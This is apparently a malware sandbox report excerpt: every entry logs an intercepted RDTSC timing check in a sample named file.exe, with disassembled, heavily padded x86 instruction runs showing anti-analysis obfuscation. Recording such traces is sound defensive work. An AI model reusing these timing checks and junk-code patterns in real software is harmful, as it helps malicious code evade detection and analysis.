Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194543 second address: 1194576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB80CDA387Fh 0x00000008 jmp 00007FB80CDA387Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FB80CDA387Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194576 second address: 119457D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119457D second address: 119459A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FB80CDA3876h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119459A second address: 11945A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11945A0 second address: 11945A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11945A5 second address: 119462D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80D16EFE3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FB80D16EFE6h 0x00000016 pushad 0x00000017 jmp 00007FB80D16EFDBh 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f popad 0x00000020 pop eax 0x00000021 mov edx, dword ptr [ebp+122D373Eh] 0x00000027 push 00000003h 0x00000029 jno 00007FB80D16EFDCh 0x0000002f mov cx, A478h 0x00000033 push 00000000h 0x00000035 add ecx, 1F784F7Ch 0x0000003b push 00000003h 0x0000003d mov dword ptr [ebp+122D3467h], ecx 0x00000043 push EE596C1Eh 0x00000048 pushad 0x00000049 jno 00007FB80D16EFDCh 0x0000004f push eax 0x00000050 push edx 0x00000051 ja 00007FB80D16EFD6h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119462D second address: 1194672 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 2E596C1Eh 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FB80CDA3878h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 lea ebx, dword ptr [ebp+1244920Dh] 0x0000002e sub dword ptr [ebp+122D179Bh], ecx 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194672 second address: 1194676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11946DA second address: 11946E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4409 second address: 11B4410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4410 second address: 11B4416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4416 second address: 11B4420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB80D16EFD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4420 second address: 11B442D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB80CDA3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B442D second address: 11B4433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B45CC second address: 11B45F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3888h 0x00000007 jo 00007FB80CDA3876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jng 00007FB80CDA3876h 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B45F6 second address: 11B45FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4883 second address: 11B48A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FB80CDA3880h 0x0000000a js 00007FB80CDA387Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B48A2 second address: 11B48BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 jne 00007FB80D16EFD6h 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 jnc 00007FB80D16EFDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4A2D second address: 11B4A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FB80CDA3880h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4A4D second address: 11B4A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4A51 second address: 11B4A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB80CDA3882h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4BCB second address: 11B4BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4BE2 second address: 11B4BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB80CDA3876h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4EE5 second address: 11B4EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB80D16EFD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4EEF second address: 11B4EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4EF3 second address: 11B4F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB80D16EFE4h 0x00000010 push ebx 0x00000011 jmp 00007FB80D16EFE5h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B4F2B second address: 11B4F55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jnc 00007FB80CDA3876h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FB80CDA3889h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B5096 second address: 11B50AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB80D16EFE2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118BF9E second address: 118BFAD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB80CDA3876h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118BFAD second address: 118BFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B5369 second address: 11B536D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B536D second address: 11B537D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB80D16EFD6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B537D second address: 11B5381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B5381 second address: 11B5387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B93F3 second address: 11B93F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11B93F9 second address: 11B9416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D11C second address: 117D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D121 second address: 117D133 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB80D16EFDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C06E1 second address: 11C0721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB80CDA3884h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB80CDA3881h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB80CDA3883h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C08BC second address: 11C08C2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C26AD second address: 11C26C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2ABB second address: 11C2AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2AC2 second address: 11C2AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2AD0 second address: 11C2ADA instructions: 0x00000000 rdtsc 0x00000002 js 00007FB80D16EFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2BB9 second address: 11C2BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C2BC2 second address: 11C2BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C330E second address: 11C331F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB80CDA3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C3818 second address: 11C381C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C381C second address: 11C3822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C3E1B second address: 11C3E8D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB80D16EFDFh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FB80D16EFE0h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FB80D16EFD8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d xor si, D905h 0x00000032 push 00000000h 0x00000034 movzx edi, cx 0x00000037 mov esi, ebx 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b jns 00007FB80D16EFE3h 0x00000041 jmp 00007FB80D16EFDDh 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C3E8D second address: 11C3EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C471B second address: 11C4721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4721 second address: 11C4725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4725 second address: 11C473A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007FB80D16EFD8h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C473A second address: 11C4740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4740 second address: 11C47BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jnp 00007FB80D16EFEEh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FB80D16EFD8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sub si, 7810h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FB80D16EFD8h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e push edx 0x0000004f pop edx 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C47BA second address: 11C47C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB80CDA3876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C5993 second address: 11C5999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C63FD second address: 11C646D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FB80CDA3878h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007FB80CDA387Fh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FB80CDA3878h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C61A9 second address: 11C61AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C646D second address: 11C6472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6472 second address: 11C6485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80D16EFDFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6485 second address: 11C64BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FB80CDA3888h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C6DAF second address: 11C6DBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CFD5D second address: 11CFD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D2743 second address: 11D274D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB80D16EFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D2D38 second address: 11D2D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D2D3C second address: 11D2D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3B95 second address: 11D3BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB80CDA3888h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3BB1 second address: 11D3BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D5BEF second address: 11D5BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C8E75 second address: 11C8E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D4E15 second address: 11D4EB9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB80CDA3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007FB80CDA387Eh 0x00000011 nop 0x00000012 jmp 00007FB80CDA3881h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007FB80CDA3878h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D35EAh], esi 0x00000045 jns 00007FB80CDA3889h 0x0000004b mov eax, dword ptr [ebp+122D00ADh] 0x00000051 cld 0x00000052 push FFFFFFFFh 0x00000054 call 00007FB80CDA387Fh 0x00000059 js 00007FB80CDA387Ch 0x0000005f xor ebx, 4BE48089h 0x00000065 pop edi 0x00000066 nop 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D062D second address: 11D0641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D9D88 second address: 11D9D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6E36 second address: 11D6E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D9D92 second address: 11D9D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D9076 second address: 11D907A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DEFCC second address: 11DEFD6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB80CDA3876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0089 second address: 11E008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DBF5B second address: 11DBF88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB80CDA387Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB80CDA3887h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DBF88 second address: 11DBF9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DBF9E second address: 11DBFA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E0F5C second address: 11E0F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB80D16EFD6h 0x0000000a rdtsc
